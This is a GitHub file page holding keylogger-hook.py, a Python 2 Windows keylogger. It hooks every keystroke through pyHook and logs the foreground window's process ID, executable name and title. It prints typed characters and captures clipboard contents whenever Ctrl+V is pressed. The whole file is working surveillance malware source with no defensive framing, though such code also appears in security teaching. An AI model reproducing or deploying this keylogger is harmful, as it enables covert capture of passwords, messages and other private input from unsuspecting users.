-
Notifications
You must be signed in to change notification settings - Fork 2
/
keylogger-hook.py
79 lines (56 loc) · 1.94 KB
/
keylogger-hook.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
from ctypes import *
import pythoncom
import pyHook
import win32clipboard
user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None
def get_current_process():
#get a handle to the fg process
hwnd = user32.GetForegroundWindow()
#find the process id
pid = c_ulong(0)
user32.GetWindowThreadProcessId(hwnd, byref(pid))
#store the current process id
process_id = "%d"%pid.value
#grab the executable
executable = create_string_buffer("\x00" * 512)
h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)
#now read its title
window_title = create_string_buffer("\x00" * 512)
length = user32.GetWindowTextA(hwnd, byref(window_title), 512)
#print header if we are in the right process
print
print "[ PID: %s - %s - %s]"%(process_id, executable.value, window_title.value)
print
#close handles
kernel32.CloseHandle(hwnd)
kernel32.CloseHandle(h_process)
def KeyStroke(event):
global current_window
#check to see if target changed windows
if event.WindowName != current_window:
current_window = event.WindowName
get_current_process()
#if they pressed a standard key
if event.Ascii > 32 and event.Ascii < 127:
print chr(event.Ascii)
else:
#if CTRL + V
if event.Key == "V":
win32clipboard.OpenClipboard()
pasted_value = win32clipboard.GetClipboardData()
win32clipboard.CloseClipboard()
print "[PASTE] - %s"%(pasted_value)
else:
print "[%s]"%event.Key,
# pass execution to next hook registered
return True
#create and register a hook manager
k1 = pyHook.HookManager()
k1.KeyDown = KeyStroke
#register the hook and execute forever
k1.HookKeyboard()
pythoncom.PumpMessages()